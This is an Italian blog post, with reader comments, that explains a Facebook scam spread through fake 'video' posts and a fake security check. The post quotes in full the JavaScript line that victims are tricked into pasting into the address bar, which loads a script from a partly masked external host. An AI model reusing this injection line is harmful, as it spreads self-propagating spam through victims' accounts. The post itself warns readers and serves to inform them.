728x90 AdSpace

Facebook: tutta la verità sul video scan!

Sulle nostre bacheche ultimamente alcuni amici condividono dei video sospetti. Si tratta di post che contengono testi simili: 

Ciao [nome] ma sei te in questo video!! YouTube www.facebook.com [Nome] Pazzesco!! non posso credere che lo hai fatto davvero














Ciao [nome] ti hanno taggato in questo video? YouTube www.facebook.com [Nome] Incredibile! Ma perche lo hai fatto















Ed inoltre: Questa Ragazza deve essere pazza per aver fatto questo! VIDE0 www.facebook.com Cavolo ma le persone stanno proprio fuori! Ma come si fa a fare questa cosa!












I link "YouTube" e "VIDE0" non sono altro che collegamenti ipertestuali che riportano alla bacheca del profilo utente (http://www.facebook.com/profile.php?sk=wall). Se clicchiamo sulle false anteprime dei video, se abbiamo installato correttamente l'ultima versione di flash player, verrà visualizzato il seguente messaggio: Controllo di sicurezza Facebook. Per vedere il video segui i passaggi Ci scusiamo per il disagio Continue






















E' una finestra di dialogo simile a quella che YouTube presenta quando il filmato non è disponibile nel paese dell'utilizzatore, quindi l'utente viene invitato a premere alcuni tasti in sequenza che nascondono istruzioni automatizzate.























Per prima cosa saremo invitati a selezionare l'URL presente sulla barra degli indirizzi, cliccare J (per cancellare l'URL) e dunque la combinazione di tasti CTRL + V, con la quale operazione incolleremo la seguente istruzione javascript:

(a=(b=document).createElement('script')).src='http://www.******saliensstreaming.com/
tag/fb.php',b.body.appendChild(a);void(0)

e poi il tasto INVIO per confermare l'operazione. In questo modo l'utente avrà eseguito una serie di azioni che si limitano all'autopubblicazione dello stesso post nella propria bacheca e in quelle degli amici, in modo da diffondersi viralmente. Il sito collegato ai post è il seguente:
























Questo nuovo metodo è riuscito a bypassare il controllo per queste tipologie di truffe da parte del sistema automatico di Facebook. Ciò perchè in precedenza era stato settato al massimo livello e molte applicazioni sono state disattivate per errore da Facebook. In realtà non vi è alcun furto del profilo o di pagine, ma consiste "semplicemente" in una serie di comandi in javascript effettuate in maniera "quasi" automatica dall'utente che cade nella trappola.

La soluzione? Rimuovete i post spam dalle vostre bacheche, passando il mouse in alto a destra del post e cliccando sulla X che appare. Per qualsiasi informazione sono a vostra disposizione.
  • Commenti

12 commenti:

  1. grazie per i suggerimenti preziosi, mi sono accorto infatti di questo problema questa mattina. posto il link al tuo articolo a tutti i miei contatti per informazione.
    marco

    RispondiElimina
  2. Grazie mille, chiunque tu sia :)

    RispondiElimina
  3. Ci vuole una certa dose di idiozia per cascarci... e dagli idioti ( e per gli idioti) non c'è difesa

    RispondiElimina
  4. Concordo con Darshan: quanto devi essere fesso per cascarci?

    RispondiElimina
  5. ma è una cosa che colpisce internet explorer secondo me; io con firefox ci ho clikkato per curiosità ora e non mi ha detto di fare nulla, mi ha rimandato solo sulla mia immagine profilo! però io su firefox ho un centinaio di estensioni per la sicurezza

    RispondiElimina
  6. Non è idiozia ma semplice distrazione,mentre magari stai facendo + cose contemporaneamente... grazie mille x i consigli

    RispondiElimina
  7. io ho cliccato il video! Una volta resomi conto che l'url era diverso, ho chiuso la pagina ed eliminato la cache, cookie ecc.

    Accade qualcosa?

    RispondiElimina
  8. Inkblot evidentemente hai cliccato sul link e non sull'anteprima!
    Comunque non è accaduto niente, tu che hai cliccato il video e eliminato cache e cookies!

    RispondiElimina
  9. iO NON HO POTUTO APRIRE IL VIDEO PERCHE `LA NET E LENTA OGGI, MA GRAZIE PER L'INFORMAZUIONE

    RispondiElimina
  10. non è idiozia, è che con tutti i metodi che ci sono per creare finti video e foto uno si spaventa! quindi non è vero nulla giusto? sono truffe è corretto?? grazie mille....

    RispondiElimina
  11. Certo che è una "truffa"!!!

    RispondiElimina
  12. Ma come hanno fatto a fare le false anteprime di video?? per poi ricondurre al sito maligno??

    RispondiElimina

Item Reviewed: Facebook: tutta la verità sul video scan! Rating: 5 Reviewed By: Unknown